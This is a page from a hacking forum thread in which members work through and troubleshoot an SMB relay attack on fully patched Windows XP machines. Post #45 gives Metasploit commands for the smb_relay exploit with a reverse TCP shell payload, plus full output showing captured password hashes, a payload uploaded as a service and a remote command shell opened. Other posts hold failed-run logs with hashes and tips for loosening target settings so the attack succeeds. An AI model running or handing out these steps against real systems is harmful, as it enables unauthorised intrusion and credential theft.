Page 5 of 13 FirstFirst ... 34567 ... LastLast
Results 41 to 50 of 122

Thread: Own Full patched XP box via HTTP

  1. #41
    Senior Member
    Join Date
    Mar 2008
    Posts
    153

    Default

    Sorry samsung.Let me try once more.Didnt know that i can try it from other attacks too.Btw whats this error.

    Code:
    FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.

  2. #42

    Exclamation Calling all members

    Quote Originally Posted by samsung View Post
    Hi All,

    After reading the posts here I thought I'd make a video to try show what's being done, there are a lot of questions on if this can be done or not, so I have spent the last few mins getting a video prepared.

    THIS IS A VIDEO ON A FULLY PATCHED XP SYSTEM WITH FIREWALL ENABLED, NO HIDDEN SERVERS ETC ARE BEING USED, JUST A SIMPLE REVERSE_TCP PAYLOAD

    Credit to operat0r for posting the tutorial & to keep things simple I have used the smb.rc (filtered with etterfilter) & smb.filter as per THIS 1ST POST

    **OBVIOUSLY CHANGING MY IP ADDRESS**

    So without further ado, sit back & watch my video HERE

    Please feel free to give any feedback good or bad, as it only takes a few mins for you to watch it, but a lot of hard work goes into making these videos
    Can anyone please try & replicate what I've done here in this video tutorial, I've had a few pm's asking where folk are going wrong etc, I want to know has anyone else had success using this method ON A FULLY PATCHED XP SP2 SYSTEM?

    If so, can you please let me know either PM me or reply to this, also let me know your failures too

  3. #43
    Senior Member
    Join Date
    Mar 2008
    Posts
    153

    Default

    Samsung.You'd feel weird on my question but can i ask you what is the difference between the HACK LIKE A PRO thread and this thread.Because i tried both.What i see is the only difference is of patched and xp untouched.If i am not wrong.But i am having the same error following instructions of both

  4. #44

    Default

    Quote Originally Posted by ibrahim52 View Post
    Samsung.You'd feel weird on my question but can i ask you what is the difference between the HACK LIKE A PRO thread and this thread.Because i tried both.What i see is the only difference is of patched and xp untouched.If i am not wrong.But i am having the same error following instructions of both

    I've not looked at Hack like a pro thread as of yet & cannot until I head home from work, I suggest you speak to Deathray & see if he can assist with you,? As for my video I will look into your failures & see if I can assist you later

  5. #45
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    I got it working after following member sniper9 suggestion on changing the secpol.msc settings in post #14 of this thread. Thanks, and cheers for that sniper9.

    resource> use exploit/windows/smb/smb_relay
    resource> set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    resource> set LHOST 192.168.0.102
    LHOST => 192.168.0.102
    resource> set LPORT 21
    LPORT => 21
    resource> exploit[*] Started reverse handler[*] Server started.[*] Exploit running as background job.
    msf exploit(smb_relay) >[*] Received 192.168.0.100:4718 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.0.100:4718 \[*] Received 192.168.0.100:4718 PIRATES-DESKTOP\Xploitz LMHASH:4cdc5e709cba696a88ebe4867eb0a397ce728fe NTHASH:b0fb45220df471876969838eaaf0de851cb76323 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.0.100 as PIRATES-DESKTOP\Xploitz...[*] AUTHENTICATED as PIRATES-DESKTOP\Xploitz...[*] Connecting to the ADMIN$ share...[*] Regenerating the payload...[*] Uploading payload...[*] Created \CgZFQkqz.exe...[*] Connecting to the Service Control Manager...[*] Obtaining a service manager handle...[*] Creating a new service...[*] Closing service handle...[*] Opening service...[*] You *MUST* manually remove the service: 192.168.0.100 (bwxcaWAS - "MMDpQKNOghtPhGrAlkrhxXlIHkumEHL")[*] You *MUST* manually delete the service file: 192.168.0.100 %SYSTEMROOT%\CgZFQkqz.exe[*] Starting the service...[*] Command shell session 1 opened (192.168.0.102:21 -> 192.168.0.100:4722)
    sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    -- ----------- ------
    1 Command shell 192.168.0.102:21 -> 192.168.0.100:4722

    msf exploit(smb_relay) > sessions -i 1[*] Starting interaction with 1...

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>PWNED!!




    Thanks for making the tutorial operat0r, and thanks for the video guide samsung.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #46
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    Umm you should not need to do the secpol.msc .. I will create a new user tonight and try it again still working on the FF issue aparently flash has the same built in security

  7. #47

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    Thanks for making the tutorial operat0r, and thanks for the video guide samsung.
    Brilliant, Glad to see someone else has had success in this, can you confirm -=Xploitz=-, if your XP box was FULLY PATCHED?

    & ALSO, to point out that had you NOT made changes re: #post 14, this would not have worked?
    Just to tie up any loose ends cheers bro

  8. #48
    Junior Member drwalter's Avatar
    Join Date
    Mar 2008
    Posts
    88

    Default

    Quote Originally Posted by samsung View Post
    If so, can you please let me know either PM me or reply to this, also let me know your failures too
    I followed everything from your video to the letter and this is where it looks like it's going wrong:

    msfconsole error: (edited specs)[*] Sending Access Denied to 192.168.1.45:1613 CREAMYPOOF\Owner[*] Received 192.168.1.45:1616 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.45:1616 \[*] Received 192.168.1.45:1616 CREAMYPOOF\Owner LMHASH:89b2130fb1f3ca3b034ac299c5c393e8578ecde5ac3 1cce7 NTHASH:301f879f15b7ce8216bd2425a1532efbdcb5208feab 1a88b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.45 as CREAMYPOOF\Owner...[*] AUTHENTICATED as CREAMYPOOF\Owner...

    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
    ================================================== ===
    Dr. Walter - Depraved linguist, Benevolent troublemaker extraordinaire
    ================================================== ===

  9. #49

    Default

    Quote Originally Posted by drwalter View Post
    I followed everything from your video to the letter and this is where it looks like it's going wrong:

    msfconsole error: (edited specs)[*] Sending Access Denied to 192.168.1.45:1613 CREAMYPOOF\Owner[*] Received 192.168.1.45:1616 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.45:1616 \[*] Received 192.168.1.45:1616 CREAMYPOOF\Owner LMHASH:89b2130fb1f3ca3b034ac299c5c393e8578ecde5ac3 1cce7 NTHASH:301f879f15b7ce8216bd2425a1532efbdcb5208feab 1a88b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.45 as CREAMYPOOF\Owner...[*] AUTHENTICATED as CREAMYPOOF\Owner...

    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
    well I wouldn't call it 'failures as such' lol since how I MADE THE VIDEO
    But what you could try is as -=xploitz=- pointed out, make sure you make changes from #post 14 & give it another try?

  10. #50
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by operat0r View Post
    Umm you should not need to do the secpol.msc .. I will create a new user tonight and try it again still working on the FF issue aparently flash has the same built in security
    I didn't "have to"...according to member dapirates1, This exploit will not work with "simple file sharing enabled"...mine had simple file sharing enabled...thats why I used member snipes9 method. Alternately according to what dapirates1 wrote me...I could "untick" simple file sharing and get this to work, although I haven't personally verified this yet. Maybe he can shed more light on this for us all?

    Quote Originally Posted by samsung View Post
    Brilliant, Glad to see someone else has had success in this, can you confirm -=Xploitz=-, if your XP box was FULLY PATCHED?

    & ALSO, to point out that had you NOT made changes re: #post 14, this would not have worked?
    Just to tie up any loose ends cheers bro
    Yes..It was FULLY patched.
    For the rest of your question samsumg...see my above statement.

    Quote Originally Posted by drwalter View Post
    I followed everything from your video to the letter and this is where it looks like it's going wrong:

    msfconsole error: (edited specs)[*] Sending Access Denied to 192.168.1.45:1613 CREAMYPOOF\Owner[*] Received 192.168.1.45:1616 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.45:1616 \[*] Received 192.168.1.45:1616 CREAMYPOOF\Owner LMHASH:89b2130fb1f3ca3b034ac299c5c393e8578ecde5ac3 1cce7 NTHASH:301f879f15b7ce8216bd2425a1532efbdcb5208feab 1a88b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.45 as CREAMYPOOF\Owner...[*] AUTHENTICATED as CREAMYPOOF\Owner...

    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
    untick simple file sharing or do what I suggested in my above post.

    Quote Originally Posted by samsung View Post
    well I wouldn't call it 'failures as such' lol since how I MADE THE VIDEO
    But what you could try is as -=xploitz=- pointed out, make sure you make changes from #post 14 & give it another try?
    This worked for me.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Page 5 of 13 FirstFirst ... 34567 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •